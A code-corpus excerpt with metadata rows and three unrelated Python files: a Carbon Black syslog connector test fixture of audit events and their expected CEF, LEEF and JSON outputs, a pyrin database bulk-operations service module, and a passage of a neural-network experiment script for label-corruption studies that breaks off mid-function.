| 288.483871 | 8,030 | 0.927988 | 252 | 8,943 | 32.678571 | 0.90873 | 0.003279 | 0.004614 | 0.006315 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.134752 | 0.022476 | 8,943 | 30 | 8,031 | 298.1 | 0.807252 | 0.004696 | 0 | 0 | 0 | 0.142857 | 0.966891 | 0.964845 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.571429 | 0 | 0.571429 | 0.142857 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 9 |
8c546ba92959ff75b0334865dd009a2dcde5e45f | 6,770 | py | Python | src/test/test_data_audit.py | opploans/cbc-syslog | 72a203b1dbe6ddd97f02dc87f36631d758564022 | [
"MIT"
] | 14 | 2020-04-28T12:52:50.000Z | 2021-08-25T00:36:51.000Z | src/test/test_data_audit.py | opploans/cbc-syslog | 72a203b1dbe6ddd97f02dc87f36631d758564022 | [
"MIT"
] | 21 | 2016-10-24T20:16:39.000Z | 2020-02-11T21:30:50.000Z | src/test/test_data_audit.py | opploans/cbc-syslog | 72a203b1dbe6ddd97f02dc87f36631d758564022 | [
"MIT"
] | 15 | 2016-12-19T20:39:24.000Z | 2020-01-02T16:26:34.000Z | # -*- coding: utf-8 -*-
null = ""
true = "true"
false = "false"
test_data_audit = {
"notifications": [
{
"requestUrl": null,
"eventTime": 1529332687006,
"eventId": "37075c01730511e89504c9ba022c3fbf",
"loginName": "bs@carbonblack.com",
"orgName": "example.org",
"flagged": false,
"clientIp": "192.0.2.3",
"verbose": false,
"description": "Logged in successfully"
},
{
"requestUrl": null,
"eventTime": 1529332689528,
"eventId": "38882fa2730511e89504c9ba022c3fbf",
"loginName": "bs@carbonblack.com",
"orgName": "example.org",
"flagged": false,
"clientIp": "192.0.2.3",
"verbose": false,
"description": "Logged in successfully"
},
{
"requestUrl": null,
"eventTime": 1529345346615,
"eventId": "b0be64fd732211e89504c9ba022c3fbf",
"loginName": "bs@carbonblack.com",
"orgName": "example.org",
"flagged": false,
"clientIp": "192.0.2.1",
"verbose": false,
"description": "Updated connector jason-splunk-test with api key Y8JNJZFBDRUJ2ZSM"
},
{
"requestUrl": null,
"eventTime": 1529345352229,
"eventId": "b41705e7732211e8bd7e5fdbf9c916a3",
"loginName": "bs@carbonblack.com",
"orgName": "example.org",
"flagged": false,
"clientIp": "192.0.2.2",
"verbose": false,
"description": "Updated connector Training with api key GRJSDHRR8YVRML3Q"
},
{
"requestUrl": null,
"eventTime": 1529345371514,
"eventId": "bf95ae38732211e8bd7e5fdbf9c916a3",
"loginName": "bs@carbonblack.com",
"orgName": "example.org",
"flagged": false,
"clientIp": "192.0.2.2",
"verbose": false,
"description": "Logged in successfully"
}
],
"success": true,
"message": "Success"
}
cef_output_audit = ['test CEF:0|CarbonBlack|CbDefense_Syslog_Connector|2.0|Audit Logs|Logged in successfully|1|rt="Jun 18 2018 14:38:07" dvchost=example.org duser=bs@carbonblack.com dvc=192.0.2.3 cs3Label="Link" cs3="" cs4Label="Threat_ID" cs4="37075c01730511e89504c9ba022c3fbf" deviceprocessname=PSC act=Alert', 'test CEF:0|CarbonBlack|CbDefense_Syslog_Connector|2.0|Audit Logs|Logged in successfully|1|rt="Jun 18 2018 14:38:09" dvchost=example.org duser=bs@carbonblack.com dvc=192.0.2.3 cs3Label="Link" cs3="" cs4Label="Threat_ID" cs4="38882fa2730511e89504c9ba022c3fbf" deviceprocessname=PSC act=Alert', 'test CEF:0|CarbonBlack|CbDefense_Syslog_Connector|2.0|Audit Logs|Updated connector jason-splunk-test with api key Y8JNJZFBDRUJ2ZSM|1|rt="Jun 18 2018 18:09:06" dvchost=example.org duser=bs@carbonblack.com dvc=192.0.2.1 cs3Label="Link" cs3="" cs4Label="Threat_ID" cs4="b0be64fd732211e89504c9ba022c3fbf" deviceprocessname=PSC act=Alert', 'test CEF:0|CarbonBlack|CbDefense_Syslog_Connector|2.0|Audit Logs|Updated connector Training with api key GRJSDHRR8YVRML3Q|1|rt="Jun 18 2018 18:09:12" dvchost=example.org duser=bs@carbonblack.com dvc=192.0.2.2 cs3Label="Link" cs3="" cs4Label="Threat_ID" cs4="b41705e7732211e8bd7e5fdbf9c916a3" deviceprocessname=PSC act=Alert', 'test CEF:0|CarbonBlack|CbDefense_Syslog_Connector|2.0|Audit Logs|Logged in successfully|1|rt="Jun 18 2018 18:09:31" dvchost=example.org duser=bs@carbonblack.com dvc=192.0.2.2 cs3Label="Link" cs3="" cs4Label="Threat_ID" cs4="bf95ae38732211e8bd7e5fdbf9c916a3" deviceprocessname=PSC act=Alert']
leef_output_audit = ['LEEF:2.0|CarbonBlack|CbDefense|0.1|AUDIT|x09|cat=AUDIT\tdevTime=Jun-18-2018 14:38:07 GMT\tdevTimeFormat=MMM dd yyyy HH:mm:ss z\teventId=37075c01730511e89504c9ba022c3fbf\tloginName=bs@carbonblack.com\torgName=example.org\tsrc=192.0.2.3\tsummary=Logged in successfully', 'LEEF:2.0|CarbonBlack|CbDefense|0.1|AUDIT|x09|cat=AUDIT\tdevTime=Jun-18-2018 14:38:09 GMT\tdevTimeFormat=MMM dd yyyy HH:mm:ss z\teventId=38882fa2730511e89504c9ba022c3fbf\tloginName=bs@carbonblack.com\torgName=example.org\tsrc=192.0.2.3\tsummary=Logged in successfully', 'LEEF:2.0|CarbonBlack|CbDefense|0.1|AUDIT|x09|cat=AUDIT\tdevTime=Jun-18-2018 18:09:06 GMT\tdevTimeFormat=MMM dd yyyy HH:mm:ss z\teventId=b0be64fd732211e89504c9ba022c3fbf\tloginName=bs@carbonblack.com\torgName=example.org\tsrc=192.0.2.1\tsummary=Updated connector jason-splunk-test with api key Y8JNJZFBDRUJ2ZSM', 'LEEF:2.0|CarbonBlack|CbDefense|0.1|AUDIT|x09|cat=AUDIT\tdevTime=Jun-18-2018 18:09:12 GMT\tdevTimeFormat=MMM dd yyyy HH:mm:ss z\teventId=b41705e7732211e8bd7e5fdbf9c916a3\tloginName=bs@carbonblack.com\torgName=example.org\tsrc=192.0.2.2\tsummary=Updated connector Training with api key GRJSDHRR8YVRML3Q', 'LEEF:2.0|CarbonBlack|CbDefense|0.1|AUDIT|x09|cat=AUDIT\tdevTime=Jun-18-2018 18:09:31 GMT\tdevTimeFormat=MMM dd yyyy HH:mm:ss z\teventId=bf95ae38732211e8bd7e5fdbf9c916a3\tloginName=bs@carbonblack.com\torgName=example.org\tsrc=192.0.2.2\tsummary=Logged in successfully']
json_output_audit = [{'requestUrl': '', 'eventTime': 1529332687006, 'eventId': '37075c01730511e89504c9ba022c3fbf', 'loginName': 'bs@carbonblack.com', 'orgName': 'example.org', 'flagged': 'false', 'clientIp': '192.0.2.3', 'verbose': 'false', 'description': 'Logged in successfully', 'type': 'AUDIT', 'source': 'test'}, {'requestUrl': '', 'eventTime': 1529332689528, 'eventId': '38882fa2730511e89504c9ba022c3fbf', 'loginName': 'bs@carbonblack.com', 'orgName': 'example.org', 'flagged': 'false', 'clientIp': '192.0.2.3', 'verbose': 'false', 'description': 'Logged in successfully', 'type': 'AUDIT', 'source': 'test'}, {'requestUrl': '', 'eventTime': 1529345346615, 'eventId': 'b0be64fd732211e89504c9ba022c3fbf', 'loginName': 'bs@carbonblack.com', 'orgName': 'example.org', 'flagged': 'false', 'clientIp': '192.0.2.1', 'verbose': 'false', 'description': 'Updated connector jason-splunk-test with api key Y8JNJZFBDRUJ2ZSM', 'type': 'AUDIT', 'source': 'test'}, {'requestUrl': '', 'eventTime': 1529345352229, 'eventId': 'b41705e7732211e8bd7e5fdbf9c916a3', 'loginName': 'bs@carbonblack.com', 'orgName': 'example.org', 'flagged': 'false', 'clientIp': '192.0.2.2', 'verbose': 'false', 'description': 'Updated connector Training with api key GRJSDHRR8YVRML3Q', 'type': 'AUDIT', 'source': 'test'}, {'requestUrl': '', 'eventTime': 1529345371514, 'eventId': 'bf95ae38732211e8bd7e5fdbf9c916a3', 'loginName': 'bs@carbonblack.com', 'orgName': 'example.org', 'flagged': 'false', 'clientIp': '192.0.2.2', 'verbose': 'false', 'description': 'Logged in successfully', 'type': 'AUDIT', 'source': 'test'}]
| 86.794872 | 1,582 | 0.683604 | 795 | 6,770 | 5.792453 | 0.132075 | 0.05646 | 0.06949 | 0.054289 | 0.879045 | 0.879045 | 0.862106 | 0.828665 | 0.828665 | 0.807383 | 0 | 0.151701 | 0.157755 | 6,770 | 77 | 1,583 | 87.922078 | 0.65591 | 0.003102 | 0 | 0.477612 | 0 | 0.149254 | 0.732325 | 0.331258 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
4fc438162b29a38e5fd29f6e2dc58fbd62afae5c | 18,245 | py | Python | src/pyrin/database/bulk/services.py | wilsonGmn/pyrin | 25dbe3ce17e80a43eee7cfc7140b4c268a6948e0 | [
"BSD-3-Clause"
] | null | null | null | src/pyrin/database/bulk/services.py | wilsonGmn/pyrin | 25dbe3ce17e80a43eee7cfc7140b4c268a6948e0 | [
"BSD-3-Clause"
] | null | null | null | src/pyrin/database/bulk/services.py | wilsonGmn/pyrin | 25dbe3ce17e80a43eee7cfc7140b4c268a6948e0 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
database bulk services module.
"""
from pyrin.application.services import get_component
from pyrin.database.bulk import DatabaseBulkPackage
def insert(*entities, **options):
"""
bulk inserts the given entities.
note that entities must be from the same type.
:param BaseEntity entities: entities to be inserted.
:keyword int chunk_size: chunk size to insert values.
after each chunk, store will be committed.
if not provided, all values will be inserted
in a single call and no commit will occur.
:keyword SECURE_TRUE | SECURE_FALSE readable: specifies that any column or attribute
which has `allow_read=False` or its name
starts with underscore `_`, should not
be included in result dict. defaults to
`SECURE_TRUE` if not provided.
:keyword dict[str, list[str]] | list[str] columns: column names to be included in result.
it could be a list of column names.
for example:
`columns=['id', 'name', 'age']`
but if you want to include
relationships, then columns for each
entity must be provided in a key for
that entity class name.
for example if there is `CarEntity` and
`PersonEntity`, it should be like this:
`columns=dict(CarEntity=
['id', 'name'],
PersonEntity=
['id', 'age'])`
if provided column names are not
available in result, they will
be ignored.
:note columns: dict[str entity_class_name, list[str column_name]] | list[str column_name]
:keyword dict[str, dict[str, str]] | dict[str, str] rename: column names that must be
renamed in the result.
it could be a dict with keys
as original column names and
values as new column names
that should be exposed instead
of original column names.
for example:
`rename=dict(age='new_age',
name='new_name')`
but if you want to include
relationships, then you must
provide a dict containing
entity class name as key and
for value, another dict
containing original column
names as keys, and column
names that must be exposed
instead of original names,
as values. for example
if there is `CarEntity` and `
PersonEntity`, it should be
like this:
`rename=
dict(CarEntity=
dict(name='new_name'),
PersonEntity=
dict(age='new_age')`
then, the value of `name`
column in result will be
returned as `new_name` column.
and also value of `age` column
in result will be returned as
'new_age' column. if provided
rename columns are not
available in result, they
will be ignored.
:note rename: dict[str entity_class_name, dict[str original_column, str new_column]] |
dict[str original_column, str new_column]
:keyword dict[str, list[str]] | list[str] exclude: column names to be excluded from
result. it could be a list of column
names. for example:
`exclude=['id', 'name', 'age']`
but if you want to include
relationships, then columns for each
entity must be provided in a key for
that entity class name.
for example if there is `CarEntity`
and `PersonEntity`, it should be
like this:
`exclude=dict(CarEntity=
['id', 'name'],
PersonEntity=
['id', 'age'])`
if provided excluded columns are not
available in result, they will be
ignored.
:note exclude: dict[str entity_class_name, list[str column_name]] | list[str column_name]
:keyword int depth: a value indicating the depth for conversion.
for example if entity A has a relationship with
entity B and there is a list of B in A, if `depth=0`
is provided, then just columns of A will be available
in result dict, but if `depth=1` is provided, then all
B entities in A will also be included in the result dict.
actually, `depth` specifies that relationships in an
entity should be followed by how much depth.
note that, if `columns` is also provided, it is required to
specify relationship property names in provided columns.
otherwise they won't be included even if `depth` is provided.
defaults to `default_depth` value of database config store.
please be careful on increasing `depth`, it could fail
application if set to higher values. choose it wisely.
normally the maximum acceptable `depth` would be 2 or 3.
there is a hard limit for max valid `depth` which is set
in `ConverterMixin.MAX_DEPTH` class variable. providing higher
`depth` value than this limit, will cause an error.
"""
return get_component(DatabaseBulkPackage.COMPONENT_NAME).insert(*entities, **options)
def update(*entities, **options):
"""
bulk updates the given entities.
note that entities must be from the same type.
:param BaseEntity entities: entities to be updated.
:keyword int chunk_size: chunk size to update values.
after each chunk, store will be committed.
if not provided, all values will be updated
in a single call and no commit will occur.
:keyword SECURE_TRUE | SECURE_FALSE readable: specifies that any column or attribute
which has `allow_read=False` or its name
starts with underscore `_`, should not
be included in result dict. defaults to
`SECURE_TRUE` if not provided.
:keyword dict[str, list[str]] | list[str] columns: column names to be included in result.
it could be a list of column names.
for example:
`columns=['id', 'name', 'age']`
but if you want to include
relationships, then columns for each
entity must be provided in a key for
that entity class name.
for example if there is `CarEntity` and
`PersonEntity`, it should be like this:
`columns=dict(CarEntity=
['id', 'name'],
PersonEntity=
['id', 'age'])`
if provided column names are not
available in result, they will
be ignored.
:note columns: dict[str entity_class_name, list[str column_name]] | list[str column_name]
:keyword dict[str, dict[str, str]] | dict[str, str] rename: column names that must be
renamed in the result.
it could be a dict with keys
as original column names and
values as new column names
that should be exposed instead
of original column names.
for example:
`rename=dict(age='new_age',
name='new_name')`
but if you want to include
relationships, then you must
provide a dict containing
entity class name as key and
for value, another dict
containing original column
names as keys, and column
names that must be exposed
instead of original names,
as values. for example
if there is `CarEntity` and `
PersonEntity`, it should be
like this:
`rename=
dict(CarEntity=
dict(name='new_name'),
PersonEntity=
dict(age='new_age')`
then, the value of `name`
column in result will be
returned as `new_name` column.
and also value of `age` column
in result will be returned as
'new_age' column. if provided
rename columns are not
available in result, they
will be ignored.
:note rename: dict[str entity_class_name, dict[str original_column, str new_column]] |
dict[str original_column, str new_column]
:keyword dict[str, list[str]] | list[str] exclude: column names to be excluded from
result. it could be a list of column
names. for example:
`exclude=['id', 'name', 'age']`
but if you want to include
relationships, then columns for each
entity must be provided in a key for
that entity class name.
for example if there is `CarEntity`
and `PersonEntity`, it should be
like this:
`exclude=dict(CarEntity=
['id', 'name'],
PersonEntity=
['id', 'age'])`
if provided excluded columns are not
available in result, they will be
ignored.
:note exclude: dict[str entity_class_name, list[str column_name]] | list[str column_name]
:keyword int depth: a value indicating the depth for conversion.
for example if entity A has a relationship with
entity B and there is a list of B in A, if `depth=0`
is provided, then just columns of A will be available
in result dict, but if `depth=1` is provided, then all
B entities in A will also be included in the result dict.
actually, `depth` specifies that relationships in an
entity should be followed by how much depth.
note that, if `columns` is also provided, it is required to
specify relationship property names in provided columns.
otherwise they won't be included even if `depth` is provided.
defaults to `default_depth` value of database config store.
please be careful on increasing `depth`, it could fail
application if set to higher values. choose it wisely.
normally the maximum acceptable `depth` would be 2 or 3.
there is a hard limit for max valid `depth` which is set
in `ConverterMixin.MAX_DEPTH` class variable. providing higher
`depth` value than this limit, will cause an error.
"""
return get_component(DatabaseBulkPackage.COMPONENT_NAME).update(*entities, **options)
| 71.269531 | 94 | 0.346561 | 1,358 | 18,245 | 4.611193 | 0.12813 | 0.038646 | 0.028745 | 0.021718 | 0.954966 | 0.954966 | 0.954966 | 0.945385 | 0.945385 | 0.945385 | 0 | 0.001292 | 0.618142 | 18,245 | 255 | 95 | 71.54902 | 0.897517 | 0.931488 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 12 |
8b0411fd5b75877e7e496a041947b69a1667ee4a | 65,860 | py | Python | models.py | maragraziani/intentionally_flawed_models | 181d616d76dd04cfe47186c5bed5c4d82bd655d4 | [
"MIT"
] | 2 | 2020-07-28T09:54:12.000Z | 2021-11-02T03:58:24.000Z | models.py | maragraziani/intentionally_flawed_models | 181d616d76dd04cfe47186c5bed5c4d82bd655d4 | [
"MIT"
] | null | null | null | models.py | maragraziani/intentionally_flawed_models | 181d616d76dd04cfe47186c5bed5c4d82bd655d4 | [
"MIT"
] | null | null | null | import keras
import numpy as np
import keras.datasets
import matplotlib.pyplot as plt
import os
import image
reload(image)
from image import *
import skimage.measure
import keras.backend as K
'''
Models contains all the classes used to implement the three types of
architectures used for the experiments:
- MLP with 2 to 6 FC layers of 4096 units
- CNN with 2 Conv layers, bn, relu, max pooling blocks
- InceptionV3
'''
class MLP():
'''
Multilayer Perceptron for experiments on MNIST
Params
deep: int
Default 2
wide: int
Default 512
optimizer: string
Default SGD
lr: float
Default 1e-2
epochs: int
Default 10
batch_size: int
Default: 32
input_shape: int
Default 28
n_classes: int
Default 10
'''
def __init__(self, deep=2, wide=512, optimizer='SGD', lr=1e-2, epochs=10,
batch_size=32, input_shape=28, n_classes=10, **kwargs):
#mask_shape = np.ones((1,512))
#mask = keras.backend.variable(mask_shape)
mlp = keras.models.Sequential()
mlp.add(keras.layers.Flatten(input_shape=(input_shape,input_shape)))
counter = 0
while counter<deep:
mlp.add(keras.layers.Dense(wide, activation=keras.layers.Activation('relu')))
counter+=1
loss_function = 'categorical_crossentropy'
activation = 'softmax'
if n_classes == 2:
loss_function = 'binary_crossentropy'
activation = 'sigmoid'
mlp.add(keras.layers.Dense(n_classes, activation=keras.layers.Activation(activation)))
#masking_layer = keras.layers.Lambda(lambda x: x*mask)(bmlp.layers[-2].output)
#if n_hidden_layers>1:
# while n_hidden_layers!=1:
# masking_layer= keras.layers.Dense(512, activation=keras.layers.Activation('sigmoid'))(masking_layer)
# n_hidden_layers-=1
#decision_layer = keras.layers.Dense(10, activation=keras.layers.Activation('softmax'))(masking_layer)
#masked_model = keras.models.Model(input= bmlp.input, output=decision_layer)
model = keras.models.Model(input=mlp.input, output=mlp.output)
model.compile(optimizer=optimizer,
loss=loss_function,
metrics=['accuracy'])
self.model = model
self.epochs = epochs
self.batch_size = batch_size
def train_and_compute_rcvs(self, dataset, lcp_gnf='0.8lcp_'):
'''
Train and Compute RCVs
Saves the embeddings at each epoch in a npy file.
dataset: Object of class either MNISTRandom, ImageNet10Random or Cifar10Random
gives the object with rhe training data (dataset.x_train, dataset.y_train)
lcp_gnf, string
says if the dataet is corrupted with label corruption (lcp)
or gaussian noise in the inputs (gnf). Specify the respective lcp (x.xlcp_),
or gnf values (x.xgnf_) followed by the name of the corruption, f.e.
0.8lcp_ for label corruption with probability 0.8
or 0.5gnf_ for gaussian noise fraction of 0.5
'''
x_train = dataset.x_train
y_train = dataset.y_train
# check if the y have a categorical distr
try:
shape1, shape2 = y_train.shape()
except:
y_train = keras.utils.to_categorical(y_train)
history=[]
embeddings=[]
batch_size=self.batch_size
# specifying what to save: note, this part changes from network to network
layers_of_interest = [layer.name for layer in self.model.layers[2:-1]]
self.model.metrics_tensors += [layer.output for layer in self.model.layers if layer.name in layers_of_interest]
epoch_number = 0
# training batch by batch and appendinh the outputs
n_batches = len(x_train)/self.batch_size
remaining = len(x_train)-n_batches * self.batch_size
while epoch_number <= self.epochs:
print epoch_number
batch_number = 0
embedding_=[]
for l in layers_of_interest:
space = np.zeros((len(x_train), self.model.get_layer(l).output.shape[-1]))
embedding_.append(space)
while batch_number <= n_batches:
outs=self.model.train_on_batch(
x_train[batch_number*batch_size:batch_number*batch_size + batch_size],
y_train[batch_number*batch_size:batch_number*batch_size + batch_size])
embedding_[0][batch_number*batch_size: batch_number*batch_size+batch_size]=outs[2]
embedding_[1][batch_number*batch_size: batch_number*batch_size+batch_size]=outs[3]
history.append(outs[0])
batch_number+=1
np.save('{}training_emb_e{}'.format(lcp_gnf,epoch_number), embedding_)
del embedding_
epoch_number +=1
self.training_history=history
self.embeddings = embeddings
def train(self, dataset):
x_train = dataset.x_train
y_train = dataset.y_train
x_train = x_train / 255.0
try:
shape1, shape2 = y_train.shape()
except:
y_train = keras.utils.to_categorical(y_train)
history=self.model.fit(x_train, y_train, epochs=self.epochs, batch_size=self.batch_size, validation_split=0.2)
self.training_history=history
def save(self, name, folder):
try:
os.listdir(folder)
except:
os.mkdir(folder)
#model_json = self.model.to_json()
#with open(folder+"/"+name+".json", "w") as json_file:
# json_file.write(model_json)
# serialize weights to HDF5
self.model.save_weights(folder+"/"+name+".h5")
print("Saved model to disk")
np.save(folder+'/'+name+'_history', self.training_history.history)
class CNN():
'''
Convolutional Neural Network for experiments on ImageNet
input, crop(2,2),
conv(200,5,5), bn, relu, maxpool(3,3),
conv(200,5,5), bn, relu, maxpool(3,3),
dense(384), bn, relu,
dense(192), bn, relu,
dense(n_classes), softmax
Params
deep: int (how many convolution blocks)
Default 2
wide: int (how many neurons in the first dense connection)
Default 512
optimizer: string
Default SGD
lr: float
Default 1e-2
epochs: int
Default 10
batch_size: int
Default: 32
input_shape: int
Default 32
n_classes: int
Default 10
'''
def __init__(self, deep=2, wide=384, optimizer='SGD', lr=1e-2, epochs=9,
batch_size=64, input_shape=299, n_classes=10, save_fold='', **kwargs):
#mask_shape = np.ones((1,512))
#mask = keras.backend.variable(mask_shape)
if input_shape<227:
cropping=2
else:
cropping = (input_shape-227)/2
cnn = keras.models.Sequential()
cnn.add(keras.layers.Cropping2D(cropping=((cropping,cropping),(cropping,cropping)), input_shape=(input_shape,input_shape,3)))
counter = 0
while counter<deep:
cnn.add(keras.layers.Conv2D(200, (5,5)))
cnn.add((keras.layers.BatchNormalization()))
cnn.add(keras.layers.Activation('relu'))
cnn.add(keras.layers.MaxPool2D(pool_size=(3,3)))
counter+=1
cnn.add(keras.layers.Flatten())
cnn.add(keras.layers.Dense(wide))
cnn.add(keras.layers.BatchNormalization())
cnn.add(keras.layers.Activation('relu'))
cnn.add(keras.layers.Dense(wide/2))
cnn.add(keras.layers.BatchNormalization())
cnn.add(keras.layers.Activation('relu'))
loss_function = 'categorical_crossentropy'
activation = 'softmax'
if n_classes == 2:
loss_function = 'binary_crossentropy'
activation = 'sigmoid'
cnn.add(keras.layers.Dense(n_classes, activation=keras.layers.Activation(activation)))
#masking_layer = keras.layers.Lambda(lambda x: x*mask)(bmlp.layers[-2].output)
#if n_hidden_layers>1:
# while n_hidden_layers!=1:
# masking_layer= keras.layers.Dense(512, activation=keras.layers.Activation('sigmoid'))(masking_layer)
# n_hidden_layers-=1
#decision_layer = keras.layers.Dense(10, activation=keras.layers.Activation('softmax'))(masking_layer)
#masked_model = keras.models.Model(input= bmlp.input, output=decision_layer)
model = keras.models.Model(input=cnn.input, output=cnn.output)
model.compile(optimizer=optimizer,
loss=loss_function,
metrics=['accuracy'])
self.model = model
self.epochs = epochs
self.batch_size = batch_size
self.n_classes = n_classes
self.save_fold = save_fold
def train(self, dataset):
#import pdb; pdb.set_trace()
x_train = dataset.x_train
y_train = dataset.y_train
x_train = x_train / 255.0
x_train -= np.mean(x_train)
np.random.seed(0)
idxs_train = np.arange(len(x_train))
np.random.shuffle(idxs_train)
x_train = np.asarray(x_train[idxs_train])
y_train = y_train[idxs_train]
x_test = dataset.x_test
y_test = dataset.y_test
x_test = x_test / 255.0
x_test -= np.mean(x_test)
idxs_test = np.arange(len(x_test))
np.random.shuffle(idxs_test)
x_test = np.asarray(x_test[idxs_test])
y_test = y_test[idxs_test]
try:
shape1, shape2 = y_train.shape()
except:
y_train = keras.utils.to_categorical(y_train, self.n_classes)
try:
shape1, shape2 = y_test.shape()
except:
y_test = keras.utils.to_categorical(y_test, self.n_classes)
history=self.model.fit(x_train, y_train, epochs=self.epochs, batch_size=self.batch_size, validation_data=(x_test, y_test))
self.training_history=history
def train_and_compute_rcvs(self, dataset):
x_train = dataset.x_train/255.
x_train -= np.mean(x_train)
y_train = dataset.y_train
np.random.seed(0)
idxs_train = np.arange(len(x_train))
np.random.shuffle(idxs_train)
x_train = np.asarray(x_train[idxs_train])
y_train= np.asarray(y_train)
y_train = y_train[idxs_train]
try:
shape1, shape2 = y_train.shape()
except:
y_train = keras.utils.to_categorical(y_train)
history=[]
embeddings=[]
batch_size=self.batch_size
print self.model.summary()
#layers_of_interest = [layer.name for layer in self.model.layers[2:-1]]
if self.deep==2:
layer_idxs = [9,13,16]
if self.deep==3:
layer_idxs = [9,12,14]
if self.deep==4:
layer_idxs = [9,12,15,19,22]
if self.deep==5:
layer_idxs = [9,12,15,18,22,25]
layers_of_interest = [self.model.layers[layer_idx].name for layer_idx in layer_idxs]
print 'loi', layers_of_interest
self.model.metrics_tensors += [layer.output for layer in self.model.layers if layer.name in layers_of_interest]
epoch_number = 0
n_batches = len(x_train)/self.batch_size
remaining = len(x_train)-n_batches * self.batch_size
while epoch_number <= self.epochs:
print epoch_number
batch_number = 0
embedding_=[]
for l in layers_of_interest:
#print 'in layer ', l
#print 'output shape ', self.model.get_layer(l).output.shape
#print 'metrics tensors, ', self.model.metrics_tensors
if len(self.model.get_layer(l).output.shape)<=2:
space = np.zeros((len(x_train), self.model.get_layer(l).output.shape[-1]))
else:
x = self.model.get_layer(l).output.shape[-3]
y = self.model.get_layer(l).output.shape[-2]
z = self.model.get_layer(l).output.shape[-1]
space = np.zeros((len(x_train), x*y*z))
embedding_.append(space)
while batch_number <= n_batches:
outs=self.model.train_on_batch(
x_train[batch_number*batch_size:batch_number*batch_size + batch_size],
y_train[batch_number*batch_size:batch_number*batch_size + batch_size])
embedding_[0][batch_number*batch_size: batch_number*batch_size+batch_size]= outs[2].reshape((min(batch_size,len(outs[2])),-1))
embedding_[1][batch_number*batch_size: batch_number*batch_size+batch_size]=outs[3].reshape((len(outs[3]),-1))
embedding_[2][batch_number*batch_size: batch_number*batch_size+batch_size]=outs[4].reshape((len(outs[4]),-1))
#embedding_[3][batch_number*batch_size: batch_number*batch_size+batch_size]=outs[5].reshape((len(outs[5]),-1))
history.append(outs[0])
batch_number+=1
#print self.save_fold
source = self.save_fold#'/mnt/nas2/results/IntermediateResults/Mara/probes/imagenet/2H_lcp0.5'
c=0
if True:
for l in layers_of_interest:
if 'max_pooling' in l:
tosave_= np.mean(embedding_[c].reshape(12775, 23*23,200), axis=1)
np.save('{}/imagenet_training_emb_e{}_l{}'.format(source,epoch_number, l), tosave_)
else:
np.save('{}/imagenet_training_emb_e{}_l{}'.format(source,epoch_number, l), embedding_[c])
c+=1
del embedding_
epoch_number +=1
self.training_history=history
self.embeddings = embeddings
def _custom_eval(self, x, y, batch_size):
## correcting shape-related issues
x = x.reshape(x.shape[0], x.shape[2], x.shape[3], x.shape[4])
y = y.reshape(y.shape[0],-1)
#
scores = []
losses = []
val_batch_no = 0
start_batch = val_batch_no
end_batch = start_batch + batch_size
tot_batches = len(y) / batch_size
# looping over data
while val_batch_no < tot_batches:
score = self.model.test_on_batch(x[start_batch:end_batch, :299, :299, :3],
y[start_batch:end_batch])
losses.append(score[0])
scores.append(score[1])
val_batch_no += 1
start_batch = end_batch
end_batch += batch_size
#print("Val: {}".format(np.mean(np.asarray(scores))))
return np.mean(np.asarray(losses)), np.mean(np.asarray(scores))
def train_and_monitor_with_rcvs(self, dataset, layers_of_interest=[], directory_save='',custom_epochs=0):
'''
Train and Monitor with RCVs
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Similar to train and compute RCVs, we just keep track
of accuracy, partial accuracy (split in true and false labels)
and we keep track of the embeddings corresponding to true and
false labels.
The function saves the embeddings at each epoch in a npy file.
The mask of corrupted labels is saved in a separated npy file.
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Inputs:
dataset: Object of class either MNISTRandom, ImageNet10Random or Cifar10Random
gives the object with rhe training data (dataset.x_train, dataset.y_train)
name, string
says the dataset name and if the dataet is corrupted with label corruption (lcp)
or gaussian noise in the inputs (gnf). For example, if the datset is imagenet and we want to specify
the respective lcp (x.xlcp_), or gnf values (x.xgnf_)
we write datasetname_x.x followed by the name of the corruption, f.e.
imagenet_0.8lcp_ for label corruption with probability 0.8
or imagenet_0.5gnf_ for gaussian noise fraction of 0.5
layers_of_interest, list
allows to specify which layers we want to extract the embeddings from.
ex.[6,11,14]
'''
directory_save = self.save_fold
# train data with the original orderng (not shuffled yet)
x_train = dataset.x_train/255.
x_train -= np.mean(x_train)
y_train = dataset.y_train
# validation data with original orderng (not shuffled yet)
x_val = np.asarray(dataset.x_test, dtype=np.float64)
x_val -= np.mean(x_val)
y_val = dataset.y_test
# setting the seed for random
try:
np.random.seed(dataset.seed)
except:
np.random.seed(0)
# mask of bool values set to true if the corresponding datapoint
# was corrupted
train_mask = dataset.train_mask
# We shuffle the dataset indeces in a new array
idxs_train = np.arange(len(x_train))
np.random.shuffle(idxs_train)
# List of corrupted and uncorrupted indeces in
# the original ordering of the data
corrupted_idxs = np.argwhere(train_mask == True)
uncorrupted_idxs = np.argwhere(train_mask == False)
try:
#import pdb; pdb.set_trace()
np.save('{}/corrupted_idxs.npy'.format(directory_save), corrupted_idxs)
except:
print("ERROR saving corr idxs")
try:
